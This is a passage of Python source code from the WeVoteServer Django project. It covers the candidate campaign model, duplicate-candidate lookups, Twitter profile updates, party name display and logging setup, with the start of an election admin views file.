'status': status,
}
return results
def find_and_remove_duplicate_candidates(self, google_civic_election_id, merge=False, remove=False):
success = False
status = "find_and_remove_duplicate_candidates NOT IMPLEMENTED YET"
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
}
return results
def retrieve_candidate_campaigns_from_all_elections_list(self):
"""
        This is used by the admin tools to show CandidateCampaigns in a drop-down, for example
"""
candidates_list_temp = CandidateCampaign.objects.all()
# Order by candidate_name.
        # To order by last name we will need to make some guesses in some cases about what the last name is.
candidates_list_temp = candidates_list_temp.order_by('candidate_name')[:300]
return candidates_list_temp
def remove_duplicate_candidate(self, candidate_id, google_civic_election_id):
# TODO DALE We need to delete the positions associated with this candidate, and convert them to belong
        # to the candidate we leave in place.
success = False
status = "COULD_NOT_DELETE_DUPLICATE_CANDIDATE"
results = {
'success': success,
'status': status,
}
return results
def retrieve_possible_duplicate_candidates(self, candidate_name, google_civic_candidate_name,
google_civic_election_id, office_we_vote_id,
politician_we_vote_id,
candidate_twitter_handle, vote_smart_id, maplight_id,
we_vote_id_from_master=''):
candidate_list_objects = []
filters = []
candidate_list_found = False
try:
candidate_queryset = CandidateCampaign.objects.all()
candidate_queryset = candidate_queryset.filter(google_civic_election_id=google_civic_election_id)
# We don't look for office_we_vote_id because of the chance that locally we are using a
# different we_vote_id
# candidate_queryset = candidate_queryset.filter(contest_office_we_vote_id__iexact=office_we_vote_id)
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
candidate_queryset = candidate_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# We want to find candidates with *any* of these values
if positive_value_exists(google_civic_candidate_name):
new_filter = Q(google_civic_candidate_name__exact=google_civic_candidate_name)
filters.append(new_filter)
elif positive_value_exists(candidate_name):
new_filter = Q(candidate_name__iexact=candidate_name)
filters.append(new_filter)
if positive_value_exists(politician_we_vote_id):
new_filter = Q(politician_we_vote_id__iexact=politician_we_vote_id)
filters.append(new_filter)
if positive_value_exists(candidate_twitter_handle):
new_filter = Q(candidate_twitter_handle__iexact=candidate_twitter_handle)
filters.append(new_filter)
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id=vote_smart_id)
filters.append(new_filter)
if positive_value_exists(maplight_id):
new_filter = Q(maplight_id=maplight_id)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
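                # e.g. two collected filters combine as Q(candidate_name__iexact=...) | Q(candidate_twitter_handle__iexact=...)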
candidate_queryset = candidate_queryset.filter(final_filters)
candidate_list_objects = candidate_queryset
if len(candidate_list_objects):
candidate_list_found = True
status = 'DUPLICATE_CANDIDATES_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_CANDIDATES_RETRIEVED'
success = True
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_DUPLICATE_CANDIDATES_FOUND_DoesNotExist'
candidate_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_candidates ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list_objects,
}
return results
def retrieve_candidates_from_non_unique_identifiers(self, twitter_handle, google_civic_election_id=0):
candidate_list_objects = []
candidate_list_found = False
twitter_handle_filtered = extract_twitter_handle_from_text_string(twitter_handle)
try:
candidate_queryset = CandidateCampaign.objects.all()
candidate_queryset = candidate_queryset.filter(candidate_twitter_handle__iexact=twitter_handle_filtered)
if positive_value_exists(google_civic_election_id):
candidate_queryset = candidate_queryset.filter(google_civic_election_id=google_civic_election_id)
candidate_queryset = candidate_queryset.order_by('-id')
candidate_list_objects = candidate_queryset
if len(candidate_list_objects):
candidate_list_found = True
status = 'CANDIDATES_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
else:
status = 'NO_CANDIDATES_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_FROM_TWITTER_HANDLE_DoesNotExist'
candidate_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_candidates_from_non_unique_identifiers ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list_objects,
}
return results
class CandidateCampaign(models.Model):
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "cand", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_candidate_campaign_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id of this candidate campaign", max_length=255, default=None, null=True,
blank=True, unique=True)
maplight_id = models.CharField(
verbose_name="maplight candidate id", max_length=255, default=None, null=True, blank=True, unique=True)
vote_smart_id = models.CharField(
verbose_name="vote smart candidate id", max_length=15, default=None, null=True, blank=True, unique=False)
# The internal We Vote id for the ContestOffice that this candidate is competing for. During setup we need to allow
# this to be null.
contest_office_id = models.CharField(
verbose_name="contest_office_id id", max_length=255, null=True, blank=True)
# We want to link the candidate to the contest with permanent ids so we can export and import
contest_office_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the office this candidate is running for", max_length=255, default=None,
null=True, blank=True, unique=False)
contest_office_name = models.CharField(verbose_name="name of the office", max_length=255, null=True, blank=True)
# politician (internal) link to local We Vote Politician entry. During setup we need to allow this to be null.
politician_id = models.BigIntegerField(verbose_name="politician unique identifier", null=True, blank=True)
# The persistent We Vote unique ID of the Politician, so we can export and import into other databases.
politician_we_vote_id = models.CharField(
verbose_name="we vote politician id", max_length=255, null=True, blank=True)
# The candidate's name.
candidate_name = models.CharField(verbose_name="candidate name", max_length=255, null=False, blank=False)
# The candidate's name as passed over by Google Civic. We save this so we can match to this candidate even
# if we edit the candidate's name locally.
google_civic_candidate_name = models.CharField(verbose_name="candidate name exactly as received from google civic",
max_length=255, null=False, blank=False)
# The full name of the party the candidate is a member of.
party = models.CharField(verbose_name="party", max_length=255, null=True, blank=True)
# A URL for a photo of the candidate.
photo_url = models.CharField(verbose_name="photoUrl", max_length=255, null=True, blank=True)
photo_url_from_maplight = models.URLField(
verbose_name='candidate portrait url of candidate from maplight', blank=True, null=True)
photo_url_from_vote_smart = models.URLField(
verbose_name='candidate portrait url of candidate from vote smart', blank=True, null=True)
# The order the candidate appears on the ballot relative to other candidates for this contest.
order_on_ballot = models.CharField(verbose_name="order on ballot", max_length=255, null=True, blank=True)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(
verbose_name="google civic election id", max_length=255, null=True, blank=True)
google_civic_election_id_new = models.PositiveIntegerField(
verbose_name="google civic election id", default=0, null=True, blank=True)
ocd_division_id = models.CharField(verbose_name="ocd division id", max_length=255, null=True, blank=True)
# State code
state_code = models.CharField(verbose_name="state this candidate serves", max_length=2, null=True, blank=True)
# The URL for the candidate's campaign web site.
candidate_url = models.URLField(verbose_name='website url of candidate campaign', blank=True, null=True)
facebook_url = models.URLField(verbose_name='facebook url of candidate campaign', blank=True, null=True)
twitter_url = models.URLField(verbose_name='twitter url of candidate campaign', blank=True, null=True)
twitter_user_id = models.BigIntegerField(verbose_name="twitter id", null=True, blank=True)
candidate_twitter_handle = models.CharField(
verbose_name='candidate twitter screen_name', max_length=255, null=True, unique=False)
twitter_name = models.CharField(
verbose_name="org name from twitter", max_length=255, null=True, blank=True)
twitter_location = models.CharField(
verbose_name="org location from twitter", max_length=255, null=True, blank=True)
twitter_followers_count = models.IntegerField(verbose_name="number of twitter followers",
null=False, blank=True, default=0)
twitter_profile_image_url_https = models.URLField(verbose_name='url of logo from twitter', blank=True, null=True)
twitter_profile_background_image_url_https = models.URLField(verbose_name='tile-able background from twitter',
blank=True, null=True)
twitter_profile_banner_url_https = models.URLField(verbose_name='profile banner image from twitter',
blank=True, null=True)
twitter_description = models.CharField(verbose_name="Text description of this organization from twitter.",
max_length=255, null=True, blank=True)
google_plus_url = models.URLField(verbose_name='google plus url of candidate campaign', blank=True, null=True)
youtube_url = models.URLField(verbose_name='youtube url of candidate campaign', blank=True, null=True)
# The email address for the candidate's campaign.
candidate_email = models.CharField(verbose_name="candidate campaign email", max_length=255, null=True, blank=True)
# The voice phone number for the candidate's campaign office.
candidate_phone = models.CharField(verbose_name="candidate campaign phone", max_length=255, null=True, blank=True)
wikipedia_page_id = models.BigIntegerField(verbose_name="pageid", null=True, blank=True)
wikipedia_page_title = models.CharField(
verbose_name="Page title on Wikipedia", max_length=255, null=True, blank=True)
wikipedia_photo_url = models.URLField(verbose_name='url of wikipedia logo', blank=True, null=True)
ballotpedia_page_title = models.CharField(
verbose_name="Page title on Ballotpedia", max_length=255, null=True, blank=True)
ballotpedia_photo_url = models.URLField(verbose_name='url of ballotpedia logo', blank=True, null=True)
# Official Statement from Candidate in Ballot Guide
ballot_guide_official_statement = models.TextField(verbose_name="official candidate statement from ballot guide",
null=True, blank=True, default="")
def election(self):
try:
election = Election.objects.get(google_civic_election_id=self.google_civic_election_id)
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("candidate.election Found multiple")
return
except Election.DoesNotExist:
logger.error("candidate.election did not find")
return
return election
def office(self):
try:
office = ContestOffice.objects.get(id=self.contest_office_id)
except ContestOffice.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("candidate.election Found multiple")
return
except ContestOffice.DoesNotExist:
logger.error("candidate.election did not find")
return
return office
def candidate_photo_url(self):
if self.photo_url_from_vote_smart:
return self.photo_url_from_vote_smart_large()
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https_original()
if self.photo_url_from_maplight:
return self.photo_url_from_maplight
if self.photo_url:
return self.photo_url
else:
return ""
# "http://votersedge.org/sites/all/modules/map/modules/map_proposition/images/politicians/2662.jpg"
# else:
# politician_manager = PoliticianManager()
# return politician_manager.politician_photo_url(self.politician_id)
def photo_url_from_vote_smart_large(self):
if positive_value_exists(self.photo_url_from_vote_smart):
# Use regex to replace '.jpg' with '_lg.jpg'
# Vote smart returns the link to the small photo, but we want to use the large photo
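            # e.g. ".../politicians/2662.jpg" becomes ".../politicians/2662_lg.jpg"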
            photo_url_from_vote_smart_large = re.sub(r'\.jpg', r'_lg.jpg', self.photo_url_from_vote_smart)
return photo_url_from_vote_smart_large
else:
return ""
def fetch_twitter_handle(self):
if positive_value_exists(self.candidate_twitter_handle):
return self.candidate_twitter_handle
elif self.twitter_url:
# Extract the twitter handle from twitter_url if we don't have it stored as a handle yet
return extract_twitter_handle_from_text_string(self.twitter_url)
        return ''  # neither a stored handle nor a twitter_url to extract from
def twitter_profile_image_url_https_bigger(self):
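        # Twitter encodes image size in the file name, e.g. "photo_normal.jpg" becomes "photo_bigger.jpg"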
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "_bigger")
else:
return ''
def twitter_profile_image_url_https_original(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "")
else:
return ''
def generate_twitter_link(self):
if self.candidate_twitter_handle:
return "https://twitter.com/{twitter_handle}".format(twitter_handle=self.candidate_twitter_handle)
else:
return ''
def get_candidate_state(self):
if positive_value_exists(self.state_code):
return self.state_code
else:
# Pull this from ocdDivisionId
if positive_value_exists(self.ocd_division_id):
ocd_division_id = self.ocd_division_id
return extract_state_from_ocd_division_id(ocd_division_id)
else:
return ''
def display_candidate_name(self):
full_name = self.candidate_name
if full_name.isupper():
full_name_corrected_capitalization = display_full_name_with_correct_capitalization(full_name)
return full_name_corrected_capitalization
return full_name
def extract_first_name(self):
full_name = self.display_candidate_name()
return extract_first_name_from_full_name(full_name)
def extract_last_name(self):
        full_name = self.display_candidate_name()
return extract_last_name_from_full_name(full_name)
def political_party_display(self):
return candidate_party_display(self.party)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_candidate_campaign_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "cand" = tells us this is a unique id for a CandidateCampaign
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
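            # e.g. site_unique_id_prefix "3v" and next integer 123 produce "wv3vcand123"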
self.we_vote_id = "wv{site_unique_id_prefix}cand{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
if self.maplight_id == "": # We want this to be unique IF there is a value, and otherwise "None"
self.maplight_id = None
super(CandidateCampaign, self).save(*args, **kwargs)
def fetch_candidate_count_for_office(office_id=0, office_we_vote_id=''):
candidate_campaign_list = CandidateCampaignListManager()
results = candidate_campaign_list.retrieve_candidate_count_for_office(office_id, office_we_vote_id)
return results['candidate_count']
# See also 'convert_to_political_party_constant' in we_vote_functions/functions.py
def candidate_party_display(raw_party):
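    # e.g. candidate_party_display('DEM') returns 'Democrat'; unrecognized values pass through unchanged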
    if not raw_party:
        return ''
    if raw_party == 'Amer. Ind.':
        return 'American Independent'
if raw_party == 'DEM':
return 'Democrat'
if raw_party == 'Democratic':
return 'Democrat'
if raw_party == 'Party Preference: Democratic':
return 'Democrat'
if raw_party == 'GRN':
return 'Green'
if raw_party == 'LIB':
return 'Libertarian'
if raw_party == 'NPP':
return 'No Party Preference'
if raw_party == 'Party Preference: None':
return 'No Party Preference'
if raw_party == 'PF':
return 'Peace and Freedom'
if raw_party == 'REP':
return 'Republican'
if raw_party == 'Party Preference: Republican':
return 'Republican'
if raw_party.lower() == 'none':
return ''
else:
return raw_party
def mimic_google_civic_initials(name):
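    # e.g. "John A Smith" becomes "John A. Smith", matching the punctuation style Google Civic uses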
    modified_name = name
    for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        modified_name = modified_name.replace(' ' + letter + ' ', ' ' + letter + '. ')
    return modified_name
class CandidateCampaignManager(models.Model):
def __unicode__(self):
return "CandidateCampaignManager"
def retrieve_candidate_campaign_from_id(self, candidate_campaign_id):
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id)
def retrieve_candidate_campaign_from_we_vote_id(self, we_vote_id):
candidate_campaign_id = 0
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
def fetch_candidate_campaign_id_from_we_vote_id(self, we_vote_id):
candidate_campaign_id = 0
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
if results['success']:
return results['candidate_campaign_id']
return 0
def fetch_candidate_campaign_we_vote_id_from_id(self, candidate_campaign_id):
we_vote_id = ''
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
if results['success']:
return results['candidate_campaign_we_vote_id']
return ''
def fetch_google_civic_candidate_name_from_we_vote_id(self, we_vote_id):
candidate_campaign_id = 0
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
if results['success']:
candidate_campaign = results['candidate_campaign']
return candidate_campaign.google_civic_candidate_name
        return ''
def retrieve_candidate_campaign_from_maplight_id(self, candidate_maplight_id):
candidate_campaign_id = 0
we_vote_id = ''
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id)
def retrieve_candidate_campaign_from_vote_smart_id(self, candidate_vote_smart_id):
candidate_campaign_id = 0
we_vote_id = ''
candidate_maplight_id = ''
candidate_name = ''
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name, candidate_vote_smart_id)
def retrieve_candidate_campaign_from_candidate_name(self, candidate_name):
candidate_campaign_id = 0
we_vote_id = ''
candidate_maplight_id = ''
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name)
if results['success']:
return results
# Try to modify the candidate name, and search again
        # MapLight, for example, will pass in "<NAME>" with a double space
        candidate_name_try2 = candidate_name.replace('  ', ' ')
results = candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name_try2)
if results['success']:
return results
        # MapLight also passes in "<NAME>", for example, while Google Civic uses "<NAME>"
candidate_name_try3 = mimic_google_civic_initials(candidate_name)
if candidate_name_try3 != candidate_name:
results = candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name_try3)
if results['success']:
return results
# Otherwise return failed results
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_candidate_campaign(
self, candidate_campaign_id, candidate_campaign_we_vote_id=None, candidate_maplight_id=None,
candidate_name=None, candidate_vote_smart_id=None):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
candidate_campaign_on_stage = CandidateCampaign()
try:
if positive_value_exists(candidate_campaign_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(id=candidate_campaign_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_ID"
elif positive_value_exists(candidate_campaign_we_vote_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(we_vote_id=candidate_campaign_we_vote_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_WE_VOTE_ID"
elif positive_value_exists(candidate_maplight_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(maplight_id=candidate_maplight_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_MAPLIGHT_ID"
elif positive_value_exists(candidate_vote_smart_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(vote_smart_id=candidate_vote_smart_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_VOTE_SMART_ID"
elif positive_value_exists(candidate_name):
candidate_campaign_on_stage = CandidateCampaign.objects.get(candidate_name=candidate_name)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_NAME"
else:
status = "RETRIEVE_CANDIDATE_SEARCH_INDEX_MISSING"
except CandidateCampaign.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
exception_multiple_object_returned = True
status = "RETRIEVE_CANDIDATE_MULTIPLE_OBJECTS_RETURNED"
except CandidateCampaign.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_CANDIDATE_NOT_FOUND"
results = {
            'success': convert_to_int(candidate_campaign_id) > 0,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
            'candidate_campaign_found': bool(convert_to_int(candidate_campaign_id)),
'candidate_campaign_id': convert_to_int(candidate_campaign_id),
'candidate_campaign_we_vote_id': candidate_campaign_we_vote_id,
'candidate_campaign': candidate_campaign_on_stage,
}
return results
def update_or_create_candidate_campaign(self, we_vote_id, google_civic_election_id, ocd_division_id,
contest_office_id, contest_office_we_vote_id, google_civic_candidate_name,
updated_candidate_campaign_values):
"""
Either update or create a candidate_campaign entry.
"""
exception_multiple_object_returned = False
new_candidate_created = False
candidate_campaign_on_stage = CandidateCampaign()
if not positive_value_exists(google_civic_election_id):
success = False
status = 'MISSING_GOOGLE_CIVIC_ELECTION_ID'
# We are avoiding requiring ocd_division_id
# elif not positive_value_exists(ocd_division_id):
# success = False
# status = 'MISSING_OCD_DIVISION_ID'
# DALE 2016-02-20 We are not requiring contest_office_id or contest_office_we_vote_id to match a candidate
# elif not positive_value_exists(contest_office_we_vote_id): # and not positive_value_exists(contest_office_id):
# success = False
# status = 'MISSING_CONTEST_OFFICE_ID'
elif not positive_value_exists(google_civic_candidate_name):
success = False
status = 'MISSING_GOOGLE_CIVIC_CANDIDATE_NAME'
else:
try:
# Note: When we decide to start updating candidate_name elsewhere within We Vote, we should stop
# updating candidate_name via subsequent Google Civic imports
# If coming from a record that has already been in We Vote
if positive_value_exists(we_vote_id) and positive_value_exists(contest_office_we_vote_id):
# If here we are using permanent public identifier contest_office_we_vote_id
candidate_campaign_on_stage, new_candidate_created = \
CandidateCampaign.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
we_vote_id__iexact=we_vote_id,
contest_office_we_vote_id__iexact=contest_office_we_vote_id,
defaults=updated_candidate_campaign_values)
# If coming (most likely) from a Google Civic import, or internal bulk update
else:
# If here we are using internal contest_office_id
candidate_campaign_on_stage, new_candidate_created = \
CandidateCampaign.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
# ocd_division_id__exact=ocd_division_id,
# 2016-02-20 We want to allow contest_office ids to change
# contest_office_we_vote_id__iexact=contest_office_we_vote_id,
google_civic_candidate_name__exact=google_civic_candidate_name,
defaults=updated_candidate_campaign_values)
success = True
status = 'CANDIDATE_CAMPAIGN_SAVED'
except CandidateCampaign.MultipleObjectsReturned as e:
success = False
status = 'MULTIPLE_MATCHING_CANDIDATE_CAMPAIGNS_FOUND'
exception_multiple_object_returned = True
exception_message_optional = status
handle_record_found_more_than_one_exception(
e, logger=logger, exception_message_optional=exception_message_optional)
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'new_candidate_created': new_candidate_created,
'candidate_campaign': candidate_campaign_on_stage,
}
return results
def update_candidate_social_media(self, candidate, candidate_twitter_handle=False, candidate_facebook=False):
"""
        Update a candidate entry with general social media data. A value passed in as False
        means "do not update".
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
success = False
status = "ENTERING_UPDATE_CANDIDATE_SOCIAL_MEDIA"
values_changed = False
candidate_twitter_handle = candidate_twitter_handle.strip() if candidate_twitter_handle else False
candidate_facebook = candidate_facebook.strip() if candidate_facebook else False
# candidate_image = candidate_image.strip() if candidate_image else False
if candidate:
if candidate_twitter_handle:
if candidate_twitter_handle != candidate.candidate_twitter_handle:
candidate.candidate_twitter_handle = candidate_twitter_handle
values_changed = True
if candidate_facebook:
if candidate_facebook != candidate.facebook_url:
candidate.facebook_url = candidate_facebook
values_changed = True
if values_changed:
candidate.save()
success = True
status = "SAVED_CANDIDATE_SOCIAL_MEDIA"
else:
success = True
status = "NO_CHANGES_SAVED_TO_CANDIDATE_SOCIAL_MEDIA"
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'candidate': candidate,
}
return results
def update_candidate_twitter_details(self, candidate, twitter_json):
"""
Update a candidate entry with details retrieved from the Twitter API.
"""
success = False
status = "ENTERING_UPDATE_CANDIDATE_TWITTER_DETAILS"
values_changed = False
if candidate:
if positive_value_exists(twitter_json['id']):
if convert_to_int(twitter_json['id']) != candidate.twitter_user_id:
candidate.twitter_user_id = convert_to_int(twitter_json['id'])
values_changed = True
if positive_value_exists(twitter_json['screen_name']):
if twitter_json['screen_name'] != candidate.candidate_twitter_handle:
candidate.candidate_twitter_handle = twitter_json['screen_name']
values_changed = True
if positive_value_exists(twitter_json['name']):
if twitter_json['name'] != candidate.twitter_name:
candidate.twitter_name = twitter_json['name']
values_changed = True
if positive_value_exists(twitter_json['followers_count']):
if convert_to_int(twitter_json['followers_count']) != candidate.twitter_followers_count:
candidate.twitter_followers_count = convert_to_int(twitter_json['followers_count'])
values_changed = True
if positive_value_exists(twitter_json['profile_image_url_https']):
if twitter_json['profile_image_url_https'] != candidate.twitter_profile_image_url_https:
candidate.twitter_profile_image_url_https = twitter_json['profile_image_url_https']
values_changed = True
if ('profile_banner_url' in twitter_json) and positive_value_exists(twitter_json['profile_banner_url']):
if twitter_json['profile_banner_url'] != candidate.twitter_profile_banner_url_https:
candidate.twitter_profile_banner_url_https = twitter_json['profile_banner_url']
values_changed = True
if positive_value_exists(twitter_json['profile_background_image_url_https']):
if twitter_json['profile_background_image_url_https'] != \
candidate.twitter_profile_background_image_url_https:
candidate.twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
values_changed = True
if positive_value_exists(twitter_json['description']):
if twitter_json['description'] != candidate.twitter_description:
candidate.twitter_description = twitter_json['description']
values_changed = True
if positive_value_exists(twitter_json['location']):
if twitter_json['location'] != candidate.twitter_location:
candidate.twitter_location = twitter_json['location']
values_changed = True
if values_changed:
candidate.save()
success = True
status = "SAVED_CANDIDATE_TWITTER_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_CANDIDATE_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'candidate': candidate,
}
return results
def clear_candidate_twitter_details(self, candidate):
"""
        Clear out the Twitter details previously cached on a candidate entry.
        """
        success = False
        status = "ENTERING_CLEAR_CANDIDATE_TWITTER_DETAILS"
if candidate:
candidate.twitter_user_id = 0
# We leave the handle in place
# candidate.candidate_twitter_handle = ""
candidate.twitter_name = ''
candidate.twitter_followers_count = 0
candidate.twitter_profile_image_url_https = ''
candidate.twitter_description = ''
candidate.twitter_location = ''
candidate.save()
success = True
status = "CLEARED_CANDIDATE_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'candidate': candidate,
}
return results
def refresh_cached_candidate_info(self, candidate_object):
"""
The candidate tables cache information from other tables. This function reaches out to the source tables
and copies over the latest information to the candidate table.
:param candidate_object:
:return:
"""
candidate_change = False
if not positive_value_exists(candidate_object.contest_office_id) \
or not positive_value_exists(candidate_object.contest_office_we_vote_id) \
or not positive_value_exists(candidate_object.contest_office_name):
office_found = False
contest_office_manager = ContestOfficeManager()
if positive_value_exists(candidate_object.contest_office_id):
results = contest_office_manager.retrieve_contest_office_from_id(candidate_object.contest_office_id)
office_found = results['contest_office_found']
elif positive_value_exists(candidate_object.contest_office_we_vote_id):
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(
candidate_object.contest_office_we_vote_id)
office_found = results['contest_office_found']
if office_found:
office_object = results['contest_office']
if not positive_value_exists(candidate_object.contest_office_id):
candidate_object.contest_office_id = office_object.id
candidate_change = True
if not positive_value_exists(candidate_object.contest_office_we_vote_id):
candidate_object.contest_office_we_vote_id = office_object.we_vote_id
candidate_change = True
if not positive_value_exists(candidate_object.contest_office_name):
candidate_object.contest_office_name = office_object.office_name
candidate_change = True
if candidate_change:
candidate_object.save()
return candidate_object
```
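The managers above follow a results-dict convention: methods hand back a dict of status flags instead of raising. A minimal caller sketch (not from the repository; the we_vote_id values are placeholders):
```python
# Hypothetical caller, following the results-dict convention used throughout these managers
from candidate.models import CandidateCampaignListManager, CandidateCampaignManager

candidate_list_manager = CandidateCampaignListManager()
results = candidate_list_manager.retrieve_all_candidates_for_office(0, 'wv3voff1')  # placeholder id
if results['candidate_list_found']:
    for candidate in results['candidate_list']:
        print(candidate.display_candidate_name(), candidate.political_party_display())

candidate_manager = CandidateCampaignManager()
results = candidate_manager.retrieve_candidate_campaign_from_we_vote_id('wv3vcand123')  # placeholder id
if results['candidate_campaign_found']:
    print(results['candidate_campaign'].generate_twitter_link())
```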
#### File: WeVoteServer/config/startup.py
```python
import wevote_functions.admin
from config import settings
def run():
wevote_functions.admin.setup_logging(
stream=settings.LOG_STREAM,
logfile=settings.LOG_FILE,
stream_level=settings.LOG_STREAM_LEVEL,
file_level=settings.LOG_FILE_LEVEL
)
print('Running')
```
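A minimal sketch of invoking the hook above manually (assumptions: Django settings are importable as `config.settings` and the hook runs once at process start):
```python
# Hypothetical manual invocation of the startup hook
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings')

from config import startup
startup.run()  # configures stream and file logging from settings, then prints 'Running'
```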
#### File: WeVoteServer/election/views_admin.py
```python
from .controllers import election_remote_retrieve, elections_import_from_master_server, elections_sync_out_list_for_api
from .models import Election
from .serializers import ElectionSerializer
from admin_tools.views import redirect_to_sign_in_page
from ballot.models import BallotReturnedListManager
from candidate.models import CandidateCampaignListManager
from django.http import HttpResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from election.models import ElectionManager
from exception.models import handle_record_found_more_than_one_exception, handle_record_not_found_exception, \
handle_record_not_saved_exception
from import_export_google_civic.controllers import retrieve_one_ballot_from_google_civic_api, \
store_one_ballot_from_google_civic_api
import json
from office.models import ContestOfficeListManager
from polling_location.models import PollingLocation
from position.models import PositionListManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, get_voter_device_id, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_election_id_integer
logger = wevote_functions.admin.get_logger(__name__)
@login_required
